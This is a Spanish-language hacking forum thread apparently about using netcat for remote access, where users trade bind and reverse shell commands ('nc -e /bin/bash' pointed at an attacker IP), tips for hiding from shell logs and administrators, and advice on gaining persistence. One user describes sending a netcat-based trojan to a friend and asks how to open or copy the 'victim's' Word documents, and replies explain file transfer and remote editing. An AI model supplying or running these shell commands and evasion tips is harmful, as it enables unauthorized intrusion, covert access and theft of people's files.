Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 2 Visitantes están viendo este tema.

D4RIO

Thylzos:
Eterm NO es un intérprete de comandos sino un emulador de terminal. lo que deberías ejecutar es el shell que deseas abrir, ya sea bash (/bin/bash), sh, csh, python, o cualquier shell o programa capáz de aceptar STDIN y STDOUT  ;D.
Si ejecutas Eterm, le saldrá eterm al usuario, y te quedarás con la salida de consola que son los errores, y toda la salida que eterm haga al STDOUT o STDERR fuera de su interfaz.
deberías usar "nc -l -vv -e /bin/bash -p 80" en la máquina ajena y "nc -vv IP 80" en la tuya o bien inversa haciendo "nc -vv -e /bin/bash TU_IP 80" en la máquina con Linux y "nc -vv -l -p 80" en la tuya.

El problema es que Linux no te permitirá usar un puerto privilegiado sin privilegios, asíque deberás conectar por uno como el 3000 o algo así. Otro problema es que TODAS las shells en Linux crean Logs a los que no podrás acceder, y eso significa que cualquier medianamente buen administrador se dará cuenta de tu presencia.
Otro tema es que sin privilegios de root no podrás hacer nada entretenido en el sistema (No es como Winbug$).

Para concluir, deberás conocer un poco del funcionamiento de Linux, y obtener privilegios, si deseas que esa shell se te conecte cada cierto tiempo, o cada inicio.

Lo mejor cuando te introduces en un sistema Linux así es usar un intérprete como csh cuyos logs no se suelen andar visando, a menos que uses un script o un programa como ACID Lab, en ese caso estás frito porque no solo se darán cuenta que estás, sino que a demás te sacarán el IP.
Jeje... te creiste que entrar en Linux era cosa de juego como entrar en Windoze? >:D

LinuX RuleZ!
OpenBSDFreeBSD

pascal88

Hola, me he leido todo el tutorial, pero aun asi consigo solucionar el problema que tengo, y es el siguiente:

Yo hago todo como dice desde el principio, todo igual, menos donde pone la ip de WHK, pues pongo la mia, la publica. Pues bien, luego cuando esta hecho el troyano, se lo paso a mi amigo, lo ejecuta, y pongo yo en ejecutar/cmd:

nc -vv -l -p 80  (intro)

y me sale una serie de cosas muy diferentes a lo que tenia que salir, es mas, me sale al principio la ip de WHK, la de 127.0.0.1, y yo no la puesto! que puedo hacer? otra de las veces me salio c:\windows>... pero era mi disco duro, porque registre y eran mis cosas!, que es lo que puedo hacer para acceder al disco duro de mi amigo??

Ni que decir tiene que mi amigo esta conforme, pues entre los dos estamos viendo esto.

D4RIO

No te transformes en un s|{rIpt kiddi3, estudia, razona, despues haces las cosas.

127.0.0.1 es tu propia makina, es el host local, o localhost, la manera con la que tu máquina se refiere a ella misma, y es igual con WHK que con vos.
Para conectarte de la manera que vos pones en tu makina, el troyano debería ejecutar:

nc -vv TU_IP 80

y listo... Si se te corta la conexión ya hablamos de otro tema, por ejemplo un firewall o un antivirus.

Lee y aprende que eslo que estás haciendondo. Protocolo TCP/IP, Sockets, etcétera...
OpenBSDFreeBSD

pascal88

Buenos dias, en primer lugar decir que mi anterior duda, ya esta resuelta mi pregunta ahora es la siguiente, ayer estuve hasta las tantas leyendo todos los post, quiza con el sueño no lo vi, pero no encuentro esto:

Una vez que yo entro y veo los titulos de las cosas que tiene la victima, puedo verlas? es decir, una vez que he visto que tiene un archivo word por ejemplo, puedo abrirlo para verlo yo? se que lo puedo abrir para que lo vea la victima, pero y verlo yo? se puede?
O puedo guardarlo en mi pc, para luego verlo yo cuando yo quiera? a que parte de jugando con Netcat pertenece esto?

Contestarme por favor, y si esta en el foro remitanme a la pagina adecuada, pues no la encuentro.

Muchisimas gracias! sois unos makinas!!


Joder, no veas lo que se aprende en este foro, antes ya aprendi sobre seguridad de redes inalambricas, y ahora esto, que me fascina aun mas.

Novlucker

#444
No, no es posible ver los documentos de la otra persona, porque tu estas conectado por consola, y para ver los demas documentos se utilizan programas externos...

Podrás verlos luego de habertelos pasado a tu pc  :P

Presta atención a este post  ;)

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

D4RIO

Si podes ver los documentos... :¬¬

Documentos de texto: Necesitarás instalarle remotamente un programa de lectura de consola tal como ViM, o nano... se que hay versiones para Windows. El mismo cmd debería redireccionartelo a tu consola, a través de la red. Por lo menos asi lo he logrado yo. Entonces editaras el texto desde tu máquina... para que no te lies, ViM funcionaría de la misma manera que la shell, es decir que se ejecuta en la máquina de él y la entrada y salida estándar se desvían a tu máquina, por lo que ViM advertirá que la entrada NO es de un Terminal...

Documentos de tipos binarios: Digo así porque, por ejemplo... un documento de tipo HTML, por ejemplo, no es TXT pero sí es de texto, en cambio uno de Word es binario, y no lograrás editarlo de ésta manera... en ese caso es obligatoria la transferencia, para editarlo en tu casita... Hay otros medios para editarlo pero requerirían que hagas un programa que automatice el trabajo con archivos de Word sin abrir Word, para lo que te puede servir AutoIt, pero es más sencillo transferirlo y editarlo, para luego reemplazarlo.

Es decir... habría manera de editar todo tipo de archivos desde la consola, como no si en Linux los hay, pero no te lies demasiado, te conviene transferir los binarios.
OpenBSDFreeBSD

Thylzos

Cita de: D4RIO en 16 Abril 2008, 14:59 PM
Thylzos:
Eterm NO es un intérprete de comandos sino un emulador de terminal. lo que deberías ejecutar es el shell que deseas abrir, ya sea bash (/bin/bash), sh, csh, python, o cualquier shell o programa capáz de aceptar STDIN y STDOUT  ;D.
Si ejecutas Eterm, le saldrá eterm al usuario, y te quedarás con la salida de consola que son los errores, y toda la salida que eterm haga al STDOUT o STDERR fuera de su interfaz.
deberías usar "nc -l -vv -e /bin/bash -p 80" en la máquina ajena y "nc -vv IP 80" en la tuya o bien inversa haciendo "nc -vv -e /bin/bash TU_IP 80" en la máquina con Linux y "nc -vv -l -p 80" en la tuya.

El problema es que Linux no te permitirá usar un puerto privilegiado sin privilegios, asíque deberás conectar por uno como el 3000 o algo así. Otro problema es que TODAS las shells en Linux crean Logs a los que no podrás acceder, y eso significa que cualquier medianamente buen administrador se dará cuenta de tu presencia.
Otro tema es que sin privilegios de root no podrás hacer nada entretenido en el sistema (No es como Winbug$).

Para concluir, deberás conocer un poco del funcionamiento de Linux, y obtener privilegios, si deseas que esa shell se te conecte cada cierto tiempo, o cada inicio.

Lo mejor cuando te introduces en un sistema Linux así es usar un intérprete como csh cuyos logs no se suelen andar visando, a menos que uses un script o un programa como ACID Lab, en ese caso estás frito porque no solo se darán cuenta que estás, sino que a demás te sacarán el IP.
Jeje... te creiste que entrar en Linux era cosa de juego como entrar en Windoze? >:D

LinuX RuleZ!

Ni de lejos... lo que quería era configurar mi sistema para que pueda acceder remotamente :P. Gracias, ahora ya sé qué me deba el error ;).

Novlucker

CitarSi podes ver los documentos...

Si bien se puede, igualmente se esta utilizando un programa externo  :¬¬

Además pasa muchas veces, que cuando se intenta utilizar un programa externo desde cmd con netcat, este se queda colgado....
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

carlipus

Buenas, sabeis si obteniendo una shell con netcat se podria formatear el pc? no penseis mal !! jeje

Es que el pc de mi hermano necesita un formateo, y me gustaria hacerlo desde ms dos, y si puede ser, desde mi pc(obteniendo una shell con netcat, se podria)

Me gusta probrar cosas, pero antes decirme si se puede claro, jeje

Saludos

pascal88

Cita de: Novlucker en 17 Abril 2008, 13:23 PM
No, no es posible ver los documentos de la otra persona, porque tu estas conectado por consola, y para ver los demas documentos se utilizan programas externos...

Podrás verlos luego de habertelos pasado a tu pc  :P

Presta atención a este post  ;)

Saludos

De nuevo te doy las gracias, pero comentarte que no me ha servido, pues tan solo consigo con eso, pasarme los archivos a mi pc, pero en blanco, es decir, por ejemplo, la "victima" tiene un documento word en el escritorio llamado: pepito, yo consigo recibir, un archivo word llamado pepito, pero en blanco.
Que es lo que hago mal? como puedo pasarme el archivo y verlo??